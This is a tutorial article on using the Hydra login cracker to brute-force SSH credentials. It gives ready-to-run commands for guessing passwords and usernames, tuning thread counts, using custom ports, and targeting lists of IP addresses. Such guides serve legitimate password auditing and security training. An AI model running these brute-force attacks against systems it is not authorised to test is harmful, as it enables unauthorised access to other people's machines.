In this article, we will be brute-forcing SSH Using Hydra. Hydra is one of the favorite tools in a hacker’s toolkit. It is an excellent tool for performing brute force attacks and can be used from a red team perspective to break into systems as well as from a blue team perspective to audit and test ssh passwords against common password lists like rockyou.txt and crackstation wordlists.
Note: This guide is purely for educational purposes. We do not claim liability for any property damages caused by the use of the knowledge gained from this guide.
Before we go ahead, let’s first understand what SSH is.
What is SSH (Secure Shell)?
SSH, or Secure Shell, is a widely used protocol that enables secure communication between two devices over an unsecured network. This protocol encrypts data that is exchanged between the devices, ensuring that the communication remains private and protected from eavesdropping or tampering.
SSH is commonly used for remote administration, file transfers, and managing network infrastructure. It is an essential tool for maintaining security in the digital world, as it helps protect sensitive information and system access from unauthorized users.
What is a Brute Force SSH attack?
However, like any security measure, SSH can be targeted by cyberattacks. One such attack is the brute-force attack, which involves systematically trying different combinations of usernames and passwords in an attempt to gain access to a system. This method can be time-consuming and resource-intensive, but it is sometimes successful, particularly when weak or easily guessable credentials are used.
What is Hydra?
Hydra is an open-source parallelized login cracker that allows us to perform various kinds of brute-force or dictionary attacks using a password list. It comes by default with all Pentesting Distros like Kali Linux. Some common protocols that Hydra supports include SSH (Secure Shell), FTP (File Transfer Protocol), and HTTP (Hypertext Transfer Protocol), among many others. However, it can also be installed with the apt command as follows:
$ sudo apt install hydra
This command should work on any Debian based distribution such as Ubuntu or Kali Linux, In case the package is not found, or you run into an error, you can also refer to the GitHub repo and install it using the specified instructions.
How to Use Hydra?
To use Hydra, you need to specify the necessary flags and options according to your attack requirements in the command line. Here’s a simple example of attacking an SSH server with a known username and a wordlist of passwords:
$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 ssh
This command would attempt to find the correct password for the user “john.doe” on the SSH server at IP address 192.168.1.100 using the provided wordlist.
Explanation of the basic syntax of hydra
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [-m MODULE_OPT] [service://server[:PORT][/OPT]]
Let’s take a closer look at its syntax components and what they mean:
- -l LOGIN or -L FILE: Choose a single target username (LOGIN) or a file with a list of usernames (FILE).
- -p PASS or -P FILE: Select one password (PASS) or a file with multiple passwords (FILE).
- -C FILE: Use a file containing username/password pairs, separated by colons.
- -e nsr: Enable extra password checks (‘n’ for null, ‘s’ for the same as the username, and ‘r’ for reversed).
- -o FILE: Save the results to a file.
- -t TASKS: Set the number of tasks (threads) to run in parallel.
- -M FILE: Use a file containing IP addresses or hostnames to target.
- -T TASKS: Set the number of tasks (threads) per target when using multiple IPs/hostnames.
- -w TIME: Set the time to wait (in seconds) between retries.
- -W TIME: Set the time to wait (in seconds) between login attempts.
- -f: Stop the attack once a valid username/password combination is found.
- -s PORT: Choose the target port number.
- -x MIN:MAX:CHARSET: Configure a brute force attack, defining minimum (MIN) and maximum (MAX) password length and character set (CHARSET).
- -c TIME: Set the time to wait (in seconds) before closing idle connections.
- -I: Turn off SSL/TLS certificate checks.
- -S: Turn on SSL/TLS connections.
- -o: Use OpenSSH-style host and port specifications.
- -u: Resume a previous session.
- -v: Verbose mode. Use -V for even more detail.
- -d: Enable debug mode.
- -4: Force IPv4 usage.
- -6: Force IPv6 usage.
- -m MODULE_OPT: Set module-specific options.
- service://server[:PORT][/OPT]: Specify the service to attack (e.g., ssh, ftp, http), the server’s IP or hostname, and any optional service-specific options.
Brute-force Usernames and Passwords with Hydra
While trying to brute-force ssh credentials, there are 3 possible combinations:
- Bruteforcing Passwords
- Bruteforcing Usernames
- Bruteforcing Passwords and Usernames
First things first, we would need wordlists for our brute-force attack. You can fetch some well knows wordlists with wordlistctl and once you have your wordlist ready, we can move on !
1. Bruteforcing Passwords
To brute-force ssh passwords with a known username, the command should look something like this in the Terminal:
$ hydra -l <username> -P <path to wordlist> <IP> ssh
2. Bruteforcing Username
To brute-force ssh usernames with a known password, the syntax is :
$ hydra -L <path to wordlist> -p <password> <IP> ssh
3. Bruteforcing Both Usernames And Passwords
If you do not know both the username and the password, the syntax is as follows:
$ hydra -L <path to username wordlist> -P <path to password wordlist> <IP> ssh
Some Special Flags
Sometimes we have some special conditions, and we need to orchestrate our attack according to that. In this section, we will discuss some special flags which helps us to customize our attacks.
1. Change The Number Of Threads
By default, hydra runs 16 threads, but we can change the value of the same with the -t flag as such :
$ hydra -l <username> -P <path to wordlist> <IP> -t <number of threads> ssh
Example of a Hydra attack against an SSH server with a custom number of threads,
$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -t 32 ssh
2. Change The Port Number
Sometimes, sysadmins change the ssh port number from the default 22 to some other port. Hence, to use a different port number, we use the -s flag as :
$ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh
3. Brute Forcing A List Of IPs
Just like we can bruteforce a list of usernames and passwords, we can also brute-force ssh IPs from a list using the -M flag :
$ hydra -l <username> -P <path to wordlist> -M <path to Ip list> ssh
4. Miscellaneous
We can also enable a more verbose output with the -V flag. Also, sometimes the users/sysadmins leave certain obvious passwords that need to be accounted for beyond the scope of our wordlists which can be included with the -e flag. A popular trio that goes with this flag are the letters ‘nsr’, where ‘n’ stands for null and tries to log in without any flag at all, ‘s‘ stands for same, i.e, it uses the username itself as a password while ‘r‘ tries the reversed username as a potential password. The syntax for this should look like this :
$ hydra -l <username> -P <path to wordlist> <IP> -V -e nsr ssh
5. -V (Verbose Mode) in Hydra
The verbose mode can be helpful for a better understanding of the progress and results of the attack. To enable verbose mode, simply use the -V
flag:
$ hydra -l <username> -P <path to wordlist> <IP> -V ssh
Example of a Hydra attack against an SSH server with verbose mode enabled:
$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -V ssh
6. -e nsr flag in Hydra
To use Hydra with the -e nsr
flag, which tests for null passwords, the same passwords as the username, and reversed username passwords:
$ hydra -l <username> -P <path to wordlist> <IP> -e nsr ssh
Example of a Hydra attack against an SSH server using the -e nsr
flag:
$ hydra -l john.doe -P /path/to/wordlist.txt 192.168.1.100 -e nsr ssh
7. -s flag in Hydra
To specify a custom port number for the SSH server using the -s
flag:
$ hydra -s <port number> -l <username> -P <path to wordlist> <IP> ssh
Example of a Hydra attack against an SSH server with a custom port number (2222):
$ hydra -s 2222 -l john.doe -P /path/to/wordlist.txt 192.168.1.100 ssh
8. -h flag (To know more usage of Hydra)
The -h
flag is used to display Hydra’s help menu, which provides an overview of the available options and their usage:
$ hydra -h
This command will output the help menu, giving you a comprehensive list of flags and options to customize your Hydra attacks, through which you can connect to a remote PC.
Conclusion
Hydra can be a pretty powerful tool when you want to brute-force ssh connections, and can be coupled with several other flags to customize your attack. However, this must not be exploited to poke around stuff you are not meant to, and the users alone are accountable for their actions.